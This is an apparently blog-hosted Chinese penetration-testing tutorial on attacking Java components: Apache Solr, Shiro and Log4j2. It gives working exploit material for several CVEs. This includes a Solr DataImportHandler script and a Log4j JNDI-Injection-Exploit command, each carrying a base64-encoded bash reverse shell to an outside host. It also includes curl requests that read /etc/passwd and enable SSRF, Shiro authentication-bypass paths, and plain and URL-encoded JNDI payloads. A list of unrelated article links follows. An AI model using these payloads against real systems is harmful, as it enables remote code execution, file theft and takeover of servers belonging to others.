服务攻防-Java组件安全&Solr搜索&Shiro鉴权&Log4j日志&JDK高版本绕过&CVE历史漏洞

知识点:

服务攻防-Java组件-Solr搜索&Shiro鉴权&Log4j日志

一、演示案例-服务攻防-Java组件-Solr搜索

主要基于HTTPApache Lucene实现的全文搜索服务器。

黑盒特征:图标及端口8393

1、命令执行(CVE-2019-17558)

影响版本

bash 复制代码
Apache Solr 5.0.0版本至8.3.1

利用项目

https://github.com/jas502n/solr_rce

bash 复制代码
D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id

2、远程命令执行漏洞(CVE-2019-0193)

影响版本

bash 复制代码
Apache Solr < 8.2.0版本

https://vulhub.org/#/environments/solr/CVE-2019-0193/

条件1

Apache SolrDataImportHandler启用了模块DataImportHandler(默认不会被启用)

条件2

Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)

选择已有核心后选择Dataimport功能并选择debug模式,更改填入以下POC,点击Execute with this Confuguration

bash 复制代码
<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>


3、Apache Solr 文件读取&SSRF (CVE-2021-27905)

获取数据库名

bash 复制代码
http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json


访问触发

bash 复制代码
curl -i -s -k -X $'POST' \
    -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
    $'http://47.94.236.117:8983/solr/demo/config'

任意文件读取

bash 复制代码
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

file协议换成http协议即可造成SSRF

bash 复制代码
例如:stream.url=http://127.0.0.1:80

4、认证绕过漏洞(CVE-2024-45216)

参考:https://mp.weixin.qq.com/s/Ke3hzJ2iGSekrsFpZV263w

bash 复制代码
GET /solr/admin/info/properties:/admin/info/key

二、演示案例-服务攻防-Java组件-Shrio鉴权

Java安全框架,能够用于身份验证、授权、加密和会话管理。

bash 复制代码
黑盒特征:数据包cookie里面rememberMe
白盒审计:看调用的shiro库对应版本是否爆过漏洞

1、CVE_2016_4437 (RCE)

bash 复制代码
Shiro-550+Shiro-721

影响范围

bash 复制代码
Apache Shiro <= 1.2.4

工具直接搜哈




2、CVE-2020-11989(身份认证绕过)

Poc:/admin/%20

影响范围:Apache Shiro < 1.7.1




3、CVE-2020-1957(身份认证绕过)

Poc:/xxx/..;/admin/

影响范围:Apache Shiro < 1.5.3

4、CVE-2022-32532(身份认证绕过)

Poc: /permit/any
/permit/a%0any可绕过

需要依赖代码具体写法,无法自动化,风险较低。

影响范围:Apache Shiro < 1.9.1

三、演示案例-服务攻防-Java组件-Log4j日志

Apache的一个开源项目,是一个基于Java的日志记录框架。

bash 复制代码
黑盒特征:盲打 会问蓝队攻击特征(${jndi:rmi:///osutj8})

1、Log4j2远程命令执行(CVE-2021-44228)

漏洞影响的产品版本包括:

bash 复制代码
Apache Log4j2 2.0 - 2.15.0-rc1

本地源码



修复


在线靶场

1、生成反弹Shell的JNDI注入

bash 复制代码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.94.236.117


2、构造JNDI注入Payload提交

bash 复制代码
${jndi:rmi://47.94.236.117:1099/osutj8}




bash 复制代码
%24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d


2、JNDI注入JDK高版本绕过

项目地址:https://github.com/B4aron1/JNDIBypass

文章参考:https://mp.weixin.qq.com/s/rxcnKAaBCDp9FHKO8eWYlQ

相关推荐
阿波罗尼亚6 小时前
桌面应用开发技术:NetBeans RCP / Eclipse RCP / JavaFX / Electron / Qt / Flutter Deskto
java·eclipse·electron
echola_mendes6 小时前
InfluxDB(四)——动态 Field/Tag 实现多类型设备统一接入的完整实践指南
java·后端·struts
Cyan_RA96 小时前
SpringMVC REST 详解
java·spring·mvc·springmvc·restful·jquery·jsp
skilllite作者6 小时前
Warp 新手极速上手与部署指南
java·前端·笔记·安全·agentskills
软泡芙6 小时前
【C# 】各种等待大全:从入门到精通
开发语言·c#·log4j
许彰午6 小时前
我手写了一个 Java 内存数据库(四):索引引擎、SQL 解析与总结
java·数据库·sql
TO_ZRG6 小时前
Android Broadcast Receiver完全入门指南
java·后端·spring
Knight_AL6 小时前
使用 CyclicBarrier + 自定义线程池实现 SpringBoot 并行报表(完整性能对比)
java·spring boot·后端
人道领域6 小时前
【LeetCode刷题日记】347.前k个高频元素
java·数据结构·算法·leetcode